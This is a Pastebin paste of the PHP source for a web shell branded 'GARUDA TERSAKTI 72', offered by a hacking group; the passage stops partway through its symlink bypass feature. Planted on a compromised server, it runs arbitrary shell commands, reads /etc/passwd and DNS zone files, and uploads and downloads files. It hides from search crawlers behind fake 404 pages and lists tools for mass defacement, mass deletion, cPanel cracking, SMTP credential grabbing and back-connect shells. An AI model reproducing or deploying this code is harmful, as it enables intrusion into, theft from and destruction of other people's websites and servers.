Ribang

garudatersakti72

Jul 12th, 2018
552
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 124.16 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11.  
  12. $auth_pass = "5405c975d634a515240ddfa90e59a7ec"; // default: mmmmpppppsssshhhh
  13. $color = "#00ff00";
  14. $default_action = 'FilesMan';
  15. $default_use_ajax = true;
  16. $default_charset = 'UTF-8';
  17. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  18. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  19. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  20. header('HTTP/1.0 404 Not Found');
  21. exit;
  22. }
  23. }
  24.  
  25. function login_shell() {
  26. ?>
  27. <?php
  28. if($_GET['gt72'] == 'login')
  29. {
  30. echo '
  31. <html>
  32. <head>
  33. <title>GARUDA TERSAKTI 72</title>
  34. <center>
  35. <body bgcolor=black>
  36. <script type="text/javascript" src="http://htmlfreecodes.com/codes/rain.js"></script>
  37. <center><br><br><style type="text/css">
  38. .kedip {
  39. -webkit-animation-name: blinker;
  40. -webkit-animation-duration: 3s;
  41. -webkit-animation-timing-function: linear;
  42. -webkit-animation-iteration-count: infinite;
  43.  
  44. -moz-animation-name: blinker;
  45. -moz-animation-duration: 2s;
  46. -moz-animation-timing-function: linear;
  47. -moz-animation-iteration-count: infinite;
  48.  
  49. animation-name: blinker;
  50. animation-duration: 1s;
  51. animation-timing-function: linear;
  52. animation-iteration-count: infinite;
  53.  
  54. color: #1b42d1;
  55. }
  56.  
  57. @-moz-keyframes blinker {
  58. 0% { opacity: 1.0; }
  59. 50% { opacity: 0.0; }
  60. 100% { opacity: 1.0; }
  61. }
  62.  
  63. @-webkit-keyframes blinker {
  64. 0% { opacity: 1.0; }
  65. 50% { opacity: 0.0; }
  66. 100% { opacity: 1.0; }
  67. }
  68.  
  69. @keyframes blinker {
  70. 0% { opacity: 1.0; }
  71. 50% { opacity: 0.0; }
  72. 100% { opacity: 1.0; }
  73. }
  74. </style><center><pre onkeydown="return false;" onmousedown="return false;" class="kedip">
  75. <font size="8" style="color:red;font-family:Iceberg;">[=--> GARUDA TERSAKTI 72 <--=]</font></center><center><br><br><img src=https://1.bp.blogspot.com/-t5REKpFtyRE/WIAFMWutPUI/AAAAAAAAB9Y/T7M7PD0NBAkL7g0vgOVtRKXHyp5MhOP7ACEw/s1600/vektor%2Bgaruda.jpg width=600px height=500px></center>
  76. <br><center><font size=6 color=lime face=monospace>masukan password dibawah :)</font><br><br><form method=post><input type=password name=pass placeholder=ketik password style="margin-top:14px;width:200px;background:black;color:gold;border:4px solid red"/> </font></body></head></html><font color=black>h<input type=submit value=masuk style="margin-top:6px;width:60px;background:black;color:#00FFFF;border:4px solid red"/></form><br/><br/><table border=1 width="50%" bordercolor="darkgrey"><td width="100%"><center><pre onkeydown="return false;" onmousedown="return false;" class="kedip"><font color=white>--=| <font style="color:red;font-family:Iceberg;"><marquee scrollamount=10 behavior=alternate width=80%>>> ^<font color=dakkhi>INDONESIAN HACKERS TEAM</font></h1></font>^ <<</marquee><font color=white> |=--</font></font></font></center></td><br><br><center><font color=lime>Powered by @<a href="https://instagram.com/gt72_"><font color=red>GARUDA <font color=white>TERSAKTI<br></font></a></div></center>';
  77. }else{
  78. echo "<font size=6><p align=left>Not Found</font><br><br>
  79. <font size=4>The requested URL was not found on this server.<br><br>
  80. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.";
  81. }
  82. ?>
  83. <?php
  84. exit;
  85. }
  86. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  87. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  88. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  89. else
  90. login_shell();
  91. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  92. @ob_clean();
  93. $file = $_GET['file'];
  94. header('Content-Description: File Transfer');
  95. header('Content-Type: application/octet-stream');
  96. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  97. header('Expires: 0');
  98. header('Cache-Control: must-revalidate');
  99. header('Pragma: public');
  100. header('Content-Length: ' . filesize($file));
  101. readfile($file);
  102. exit;
  103. }
  104. ?>
  105. <html>
  106. <head>
  107. <script language="JavaScript"> function tb5_makeArray(n){ this.length = n; return this.length; } tb5_messages = new tb5_makeArray(7); tb5_messages[0] = ""; tb5_messages[1] = ""; tb5_messages[2] = ""; tb5_messages[3] = "Hello World :)"; tb5_messages[4] = "We are GARUDA TERSAKTI 72"; tb5_messages[5] = "You Can't Stop Me :)"; tb5_messages[6] = "Hacking Not Crime!!"; tb5_rptType = 'infinite'; tb5_rptNbr = 20; tb5_speed = 30; tb5_delay = 2000; var tb5_counter=2; var tb5_currMsg=0; var tb5_stsmsg=""; function tb5_shuffle(arr){ var k; for (i=0; i<arr.length; i++){ k = Math.round(Math.random() * (arr.length - i - 1)) + i; temp = arr[i];arr[i]=arr[k];arr[k]=temp; } return arr; } tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length); tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length); for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_"; } tb5_arr = tb5_shuffle(tb5_arr); function tb5_init(n){ var k; if (n == tb5_arr.length){ if (tb5_currMsg == tb5_messages.length-1){ if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){ clearTimeout(tb5_timerID); return; } tb5_counter++; tb5_currMsg=0; } else{ tb5_currMsg++; } n=0; tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length); tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length); for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){ tb5_arr[i] = i; tb5_sts[i] = "_"; } tb5_arr = tb5_shuffle(tb5_arr); tb5_sp=tb5_delay; } else{ tb5_sp=tb5_speed; k = tb5_arr[n]; tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k); tb5_stsmsg = ""; for (var i=0; i<tb5_sts.length; i++) tb5_stsmsg += tb5_sts[i]; document.title = tb5_stsmsg; n++; } tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp); } function tb5_randomizetitle(){ tb5_init(0); } tb5_randomizetitle(); </script>
  108. <title>Love TeeN72 :*</title>
  109. <meta name='author' content='IndoXploit'>
  110. <meta charset="UTF-8">
  111. <link href="http://bootswatch.com/flatly/bootstrap.min.css" rel="stylesheet">
  112. <script ></script>
  113. <style type='text/css'>
  114. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  115. body{
  116. background: url(http://i66.tinypic.com/2bb8up.jpg) no-repeat center center fixed; #fff;
  117. -webkit-background-size: cover;
  118. -moz-background-size: cover;
  119. -o-background-size: cover;
  120. background-size: cover;
  121. background-attachment:fixed;
  122. color:white;
  123. font-size:13px;
  124. font-family: "Lato","Helvetica Neue",Helvetica,Arial,sans-serif;
  125. }
  126. h1{
  127. color:#ffffff;
  128. }
  129. li {
  130. display: inline;
  131. margin: 5px;
  132. padding: 5px;
  133. }
  134. table, th, td {
  135. border-collapse:collapse;
  136. font-family: Tahoma, Geneva, sans-serif;
  137. background: transparent;
  138. font-family: 'Ubuntu';
  139. font-size: 13px;
  140. padding: 5px;
  141. }
  142. .table_home, .td_home {
  143. border: 1px solid #FFFF00;
  144. }
  145. .td_home:hover {
  146. background:grey;
  147. }
  148. .th_home{
  149. padding: 5px;
  150. border: 3px solid #FFFF00;
  151. background:transparent;
  152. }
  153. th {
  154. padding: 15px;
  155. }
  156. a {
  157. color: #ffffff;
  158. }
  159.  
  160. input[type=text], input[type=password]{
  161. background: transparent;
  162. color: white;
  163. border: 1px solid #FFFF00;
  164. margin: 5px auto;
  165. padding-left: 5px;
  166. font-family: 'Ubuntu';
  167. font-size: 13px;
  168. }
  169. input[type=submit]{
  170. color: #8B0000;
  171. border: 1px solid #800000;
  172. margin: 5px;
  173. padding: 3px 15px;
  174. font-family: 'Ubuntu';
  175. font-size: 13px;
  176. }
  177. textarea {
  178. border: 1px solid #FFFF00;
  179. width: 100%;
  180. height: 400px;
  181. padding-left: 5px;
  182. margin: 10px auto;
  183. resize: none;
  184. background: transparent;
  185. color: #FFFF00;
  186. font-family: 'Ubuntu';
  187. font-size: 13px;
  188. }
  189. select {
  190. width: 152px;
  191. background: #000000;
  192. color: #FFFF00;
  193. border: 1px solid #8B0000;
  194. margin: 5px auto;
  195. padding-left: 5px;
  196. font-family: 'Ubuntu';
  197. font-size: 13px;
  198. }
  199. option:hover {
  200. background: #FFFF00;
  201. color: #000000;
  202. }
  203. </style>
  204. </head>
  205. <?php
  206. ###############################################################################
  207. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  208. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  209. // Tapi Selebihnya, itu hasil kreasi Garuda Tersakti 72 dibantu oleh IndoXploit.
  210. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  211. // Greetz: All Member GarudaTersakti 72. & all my friends.
  212. ###############################################################################
  213. function w($dir,$perm) {
  214. if(!is_writable($dir)) {
  215. return "<font color=red>".$perm."</font>";
  216. } else {
  217. return "<font color=#18BC9C>".$perm."</font>";
  218. }
  219. }
  220. function r($dir,$perm) {
  221. if(!is_readable($dir)) {
  222. return "<font color=red>".$perm."</font>";
  223. } else {
  224. return "<font color=#18BC9C>".$perm."</font>";
  225. }
  226. }
  227. function exe($cmd) {
  228. if(function_exists('system')) {
  229. @ob_start();
  230. @system($cmd);
  231. $buff = @ob_get_contents();
  232. @ob_end_clean();
  233. return $buff;
  234. } elseif(function_exists('exec')) {
  235. @exec($cmd,$results);
  236. $buff = "";
  237. foreach($results as $result) {
  238. $buff .= $result;
  239. } return $buff;
  240. } elseif(function_exists('passthru')) {
  241. @ob_start();
  242. @passthru($cmd);
  243. $buff = @ob_get_contents();
  244. @ob_end_clean();
  245. return $buff;
  246. } elseif(function_exists('shell_exec')) {
  247. $buff = @shell_exec($cmd);
  248. return $buff;
  249. }
  250. }
  251. function perms($file){
  252. $perms = fileperms($file);
  253. if (($perms & 0xC000) == 0xC000) {
  254. // Socket
  255. $info = 's';
  256. } elseif (($perms & 0xA000) == 0xA000) {
  257. // Symbolic Link
  258. $info = 'l';
  259. } elseif (($perms & 0x8000) == 0x8000) {
  260. // Regular
  261. $info = '-';
  262. } elseif (($perms & 0x6000) == 0x6000) {
  263. // Block special
  264. $info = 'b';
  265. } elseif (($perms & 0x4000) == 0x4000) {
  266. // Directory
  267. $info = 'd';
  268. } elseif (($perms & 0x2000) == 0x2000) {
  269. // Character special
  270. $info = 'c';
  271. } elseif (($perms & 0x1000) == 0x1000) {
  272. // FIFO pipe
  273. $info = 'p';
  274. } else {
  275. // Unknown
  276. $info = 'u';
  277. }
  278. // Owner
  279. $info .= (($perms & 0x0100) ? 'r' : '-');
  280. $info .= (($perms & 0x0080) ? 'w' : '-');
  281. $info .= (($perms & 0x0040) ?
  282. (($perms & 0x0800) ? 's' : 'x' ) :
  283. (($perms & 0x0800) ? 'S' : '-'));
  284. // Group
  285. $info .= (($perms & 0x0020) ? 'r' : '-');
  286. $info .= (($perms & 0x0010) ? 'w' : '-');
  287. $info .= (($perms & 0x0008) ?
  288. (($perms & 0x0400) ? 's' : 'x' ) :
  289. (($perms & 0x0400) ? 'S' : '-'));
  290. // World
  291. $info .= (($perms & 0x0004) ? 'r' : '-');
  292. $info .= (($perms & 0x0002) ? 'w' : '-');
  293. $info .= (($perms & 0x0001) ?
  294. (($perms & 0x0200) ? 't' : 'x' ) :
  295. (($perms & 0x0200) ? 'T' : '-'));
  296. return $info;
  297. }
  298. function hdd($s) {
  299. if($s >= 1073741824)
  300. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  301. elseif($s >= 1048576)
  302. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  303. elseif($s >= 1024)
  304. return sprintf('%1.2f',$s / 1024 ) .' KB';
  305. else
  306. return $s .' B';
  307. }
  308. function ambilKata($param, $kata1, $kata2){
  309. if(strpos($param, $kata1) === FALSE) return FALSE;
  310. if(strpos($param, $kata2) === FALSE) return FALSE;
  311. $start = strpos($param, $kata1) + strlen($kata1);
  312. $end = strpos($param, $kata2, $start);
  313. $return = substr($param, $start, $end - $start);
  314. return $return;
  315. }
  316. function getsource($url) {
  317. $curl = curl_init($url);
  318. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  319. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  320. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  321. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  322. $content = curl_exec($curl);
  323. curl_close($curl);
  324. return $content;
  325. }
  326. function bing($dork) {
  327. $npage = 1;
  328. $npages = 30000;
  329. $allLinks = array();
  330. $lll = array();
  331. while($npage <= $npages) {
  332. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  333. if($x) {
  334. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  335. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  336. $npage = $npage + 10;
  337. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  338. } else break;
  339. }
  340. $URLs = array();
  341. foreach($allLinks as $url){
  342. $exp = explode("/", $url);
  343. $URLs[] = $exp[2];
  344. }
  345. $array = array_filter($URLs);
  346. $array = array_unique($array);
  347. $sss = count(array_unique($array));
  348. foreach($array as $domain) {
  349. echo $domain."\n";
  350. }
  351. }
  352. function reverse($url) {
  353. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  354. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  355. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  356. curl_setopt($ch, CURLOPT_HEADER, 0);
  357. curl_setopt($ch, CURLOPT_POST, 1);
  358. $resp = curl_exec($ch);
  359. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  360. $array = explode(",,", $resp);
  361. unset($array[0]);
  362. foreach($array as $lnk) {
  363. $lnk = "http://$lnk";
  364. $lnk = str_replace(",", "", $lnk);
  365. echo $lnk."\n";
  366. ob_flush();
  367. flush();
  368. }
  369. curl_close($ch);
  370. }
  371. if(get_magic_quotes_gpc()) {
  372. function idx_ss($array) {
  373. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  374. }
  375. $_POST = idx_ss($_POST);
  376. $_COOKIE = idx_ss($_COOKIE);
  377. }
  378.  
  379. if(isset($_GET['dir'])) {
  380. $dir = $_GET['dir'];
  381. chdir($dir);
  382. } else {
  383. $dir = getcwd();
  384. }
  385. $kernel = php_uname();
  386. $admin_id=$_SERVER['SERVER_ADMIN'];
  387. $software = getenv("SERVER_SOFTWARE");
  388. $d0mains = @file("/etc/named.conf");
  389. $users=@file('/etc/passwd');
  390. if($d0mains)
  391. {
  392. $count;
  393. foreach($d0mains as $d0main)
  394. {
  395. if(@ereg("zone",$d0main))
  396. {
  397. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  398. flush();
  399. if(strlen(trim($domains[1][0])) > 2)
  400. {
  401. flush();
  402. $count++;
  403. }
  404. }
  405. }
  406. }
  407. $kernel = php_uname();
  408. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  409. $dir = str_replace("\\","/",$dir);
  410. $scdir = explode("/", $dir);
  411. $freespace = hdd(disk_free_space("/"));
  412. $total = hdd(disk_total_space("/"));
  413. $used = $total - $freespace;
  414. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=#48D1CC>OFF</font>";
  415. $ds = @ini_get("disable_functions");
  416. $mysql = (function_exists('mysql_connect')) ? "<font color=#48D1CC>ON</font>" : "<font color=red>OFF</font>";
  417. $curl = (function_exists('curl_version')) ? "<font color=#48D1CC>ON</font>" : "<font color=red>OFF</font>";
  418. $wget = (exe('wget --help')) ? "<font color=#48D1CC>ON</font>" : "<font color=red>OFF</font>";
  419. $perl = (exe('perl --help')) ? "<font color=#48D1CC>ON</font>" : "<font color=red>OFF</font>";
  420. $python = (exe('python --help')) ? "<font color=#48D1CC>ON</font>" : "<font color=red>OFF</font>";
  421. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=#48D1CC>NONE</font>";
  422. if(!function_exists('posix_getegid')) {
  423. $user = @get_current_user();
  424. $uid = @getmyuid();
  425. $gid = @getmygid();
  426. $group = "?";
  427. } else {
  428. $uid = @posix_getpwuid(posix_geteuid());
  429. $gid = @posix_getgrgid(posix_getegid());
  430. $user = $uid['name'];
  431. $uid = $uid['uid'];
  432. $group = $gid['name'];
  433. $gid = $gid['gid'];
  434. }
  435. echo "<style type=text/css>
  436. .kedip {
  437. -webkit-animation-name: blinker;
  438. -webkit-animation-duration: 3s;
  439. -webkit-animation-timing-function: linear;
  440. -webkit-animation-iteration-count: infinite;
  441.  
  442. -moz-animation-name: blinker;
  443. -moz-animation-duration: 2s;
  444. -moz-animation-timing-function: linear;
  445. -moz-animation-iteration-count: infinite;
  446.  
  447. animation-name: blinker;
  448. animation-duration: 1s;
  449. animation-timing-function: linear;
  450. animation-iteration-count: infinite;
  451.  
  452. color: #1b42d1;
  453. }
  454.  
  455. @-moz-keyframes blinker {
  456. 0% { opacity: 1.0; }
  457. 50% { opacity: 0.0; }
  458. 100% { opacity: 1.0; }
  459. }
  460.  
  461. @-webkit-keyframes blinker {
  462. 0% { opacity: 1.0; }
  463. 50% { opacity: 0.0; }
  464. 100% { opacity: 1.0; }
  465. }
  466.  
  467. @keyframes blinker {
  468. 0% { opacity: 1.0; }
  469. 50% { opacity: 0.0; }
  470. 100% { opacity: 1.0; }
  471. }
  472. </style>
  473. <center><pre onkeydown=return false; onmousedown=return false; class=kedip><font size=12 style=color:#E6E6FA font-family:Iceberg>&#9760; GARUDA TERSAKTI 72 Shell &#9760;</font></center>";
  474. echo "<center> System: <font color=#48D1CC>".$kernel."</font><br>";
  475. echo "User: <font color=#48D1CC>".$user."</font> (".$uid.") Group: <font color=#48D1CC>".$group."</font> (".$gid.")<br>";
  476. echo "Admin : <font color=#48D1CC>".$admin_id."</font> | Websites: <font color=#48D1CC>$count</font> Domains<br>";
  477. echo "Host: <font color=#48D1CC>".$_SERVER['SERVER_NAME']."</font><br>";
  478. echo "Safe Mode: ".$sm."<br>";
  479. echo "Magic_quotes_gpc: ".$magico."<br>";
  480. echo "Server IP: <font color=#48D1CC>".$ip."</font> | Your IP: <font color=#48D1CC>".$_SERVER['REMOTE_ADDR']."</font><br>";
  481. echo "HDD: <font color=#48D1CC>$used</font> / <font color=#48D1CC>$total</font> ( Free: <font color=#48D1CC>$freespace</font> )<br>";
  482. echo "Safe Mode: $sm<br>";
  483. echo "Disable Functions: $show_ds<br>";
  484. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </center><br><marquee> Terima kasih telah menggunakan SHELL ini, tunggu updatenya di <a href='http://blog.garudatersakti72.id' target='_blank'><font color='#48D1CC'>https://garudatersakti72.id</font></a> yaa &#9786;</marquee>";
  485. if (isset($_GET['about'])) {
  486. echo "<br><br><hr><center><img src='https://image.ibb.co/kdXFbx/1524360437509.png' height=300px width=300px></center><center><font color=white size=4>Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini,<br>
  487. Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada,<br>
  488. Tanpa kalian kita tidak akan BESAR seperti sekarang ..<br>
  489. Greetz :<br>All Member <u>GarudaTersakti 72</u><br>special thanks to :<br>IndoXpoit <font color=red><></font> N45HT <font color=red><></font> Babby Cyber Team and <font color=red>You</font> :)<br>Support kami >><a href='https://instagram.com/gt72_/' target='_blank'><font color='#18BC9C'>klik here!</font></a><<<br><br><br>Contac me : garudatersakti72@gmail.com</center></font>";
  490. }
  491. echo "<hr>";
  492. echo "<center>";
  493. echo "<ul>";
  494. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?'>Home</a><font color=red>]</font></li>";
  495. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=upload'>Upload</a><font color=red>]</font></li>";
  496. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=csrf'>Csrf Online</a><font color=red>]</font></li>";
  497. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=sym404'>Sym 404</a><font color=red>]</font></li>";
  498. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=symlink'>Symlink</a><font color=red>]</font></li>";
  499. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=sympy'>Symlink Python</a><font color=red>]</font></li>";
  500. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=hashid'>Hash Identification</a><font color=red>]</font></li>";
  501. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=hashgen'>Hash Generator</a><font color=red>]</font></li>";
  502. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='#com'>Command</a><font color=red>]</font></li>";
  503. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=mass_deface'>Mass Deface</a><font color=red>]</font></li>";
  504. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=mass_delete'>Mass Delete</a><font color=red>]</font></li>";
  505. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&bypass=vhosts'>Bypass Vhost</a></li>";
  506. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&bypass=etcpass'>Bypass /etc/passwd</a></li>";
  507. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=config'>Config</a><font color=red>]</font></li>";
  508. echo "<br>";
  509. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&bypass=cloudfl'>Bypass CloudFlare</a></li>";
  510. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=jumping'>Jumping</a><font color=red>]</font></li>";
  511. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&bypass=disablefunc'>Disable Functions</a><font color=red>]</font></li>";
  512. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cpanel'>CPanel Crack</a><font color=red>]</font></li>";
  513. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=network'>Network</a><font color=red>]</font></li>";
  514. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=zoneh'>Zone-H</a><font color=red>]</font></li>";
  515. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=smtp'>SMTP Grabber</a><font color=red>]</font></li>";
  516. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cgi'>CGI Telnet</a><font color=red>]</font></li>";
  517. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=bctools'>Back Connect</a><font color=red>]</font></li>";
  518. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=adminer'>Adminer</a><font color=red>]</font></li>";
  519. echo "<br>";
  520. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=fake_root'>Fake Root</a><font color=red>]</font></li>";
  521. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a><font color=red>]</font></li>";
  522. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a><font color=red>]</font></li>";
  523. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a><font color=red>]</font></li>";
  524. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a><font color=red>]</font></li>";
  525. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a><font color=red>]</font></li>";
  526. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a><font color=red>]</font></li>";
  527. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' style='color: red;' href='?about=true'>About</a><font color=red>]</font></li>";
  528. echo "<font color=red>[<a style=margin:3px; class='btn btn-success btn-sm' style='color: red;' href='?logout=true'>Logout</a><font color=red>]</font></li></font></font>";
  529. echo "</ul>";
  530. echo "</center>";
  531. echo "<hr>";
  532. echo "Current DIR: ";
  533. foreach($scdir as $c_dir => $cdir) {
  534. echo "<a href='?dir=";
  535. for($i = 0; $i <= $c_dir; $i++) {
  536. echo "$scdir[$i]";
  537. if($i != $c_dir) {
  538. echo "/";
  539. }
  540. }
  541. echo "'>$cdir</a>/";
  542. }
  543. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ] <br>";
  544. if($_GET['logout'] == true) {
  545. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  546. echo "<script>window.location='?';</script>";
  547. } elseif($_GET['do'] == 'upload') {
  548. echo "<center>";
  549. if($_POST['upload']) {
  550. if($_POST['tipe_upload'] == 'biasa') {
  551. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  552. $act = "<font color=#48D1CC>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  553. } else {
  554. $act = "<font color=red>failed to upload file</font>";
  555. }
  556. } else {
  557. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  558. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  559. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  560. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  561. $act = "<font color=#48D1CC>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  562. } else {
  563. $act = "<font color=red>failed to upload file</font>";
  564. }
  565. } else {
  566. $act = "<font color=red>failed to upload file</font>";
  567. }
  568. }
  569. }
  570. echo "<h1> Upload File </h1>:
  571. <form method='post' enctype='multipart/form-data'>
  572. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")."
  573. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")."<br>
  574. <input type='file' name='ix_file'>
  575. <input type='submit' value='upload' name='upload' class='btn btn-success btn-sm'>
  576. </form>";
  577. echo $act;
  578. echo "</center>";
  579. }
  580. elseif($_GET['bypass'] == 'cloudfl') {
  581. echo '<form method="post">
  582. <center>
  583. <h3>Bypass CloudFlare</h3>
  584. <select class="inputz" name="krz">
  585. <option>ftp</option>
  586. <option>direct-connect</option>
  587. <option>webmail</option>
  588. <option>cpanel</option>
  589. </select>
  590. <input class="inputz" type="text" name="target" value="url">
  591. <input class="inputzbut" type="submit" value="Bypass!"></center>';
  592. $target = $_POST['target'];
  593. # Bypass From FTP
  594. if ($_POST['krz'] == "ftp") {
  595. $ftp = gethostbyname("ftp." . "$target");
  596. echo "<br><p align='center' dir='ltr'>
  597. <font color='white'>CORRECT IP IS: </font>
  598. <font color='lime'>$ftp</font></p>";
  599. }
  600. # Bypass From Direct-Connect
  601. if ($_POST['krz'] == "direct-connect") {
  602. $direct = gethostbyname("direct-connect." . "$target");
  603. echo "<br><p align='center' dir='ltr'>
  604. <font color='white'>CORRECT IP IS: </font>
  605. <font color='lime'>$direct</font></p>";
  606. }
  607. # Bypass From Webmail
  608. if ($_POST['krz'] == "webmail") {
  609. $web = gethostbyname("webmail." . "$target");
  610. echo "<br><p align='center' dir='ltr'>
  611. <font color='white'>CORRECT IP IS: </font>
  612. <font color='lime'>$web</font></p>";
  613. }
  614. # Bypass From Cpanel
  615. if ($_POST['krz'] == "cpanel") {
  616. $cpanel = gethostbyname("cpanel." . "$target");
  617. echo "<br><p align='center' dir='ltr'>
  618. <font color='white'>CORRECT IP IS: </font>
  619. <font color='lime'>$cpanel</font></p>";
  620. }
  621. }
  622. elseif($_GET['bypass'] == 'vhosts'){
  623. echo "<form method='post' action=''>";
  624. echo "<center><h3>Bypass Symlink vHost</h3>";
  625. echo "<input type='submit' value='Bypass!' name='jembut'>";
  626. if (isset($_POST['jembut'])){
  627. mkdir('symvhosts', 0755);
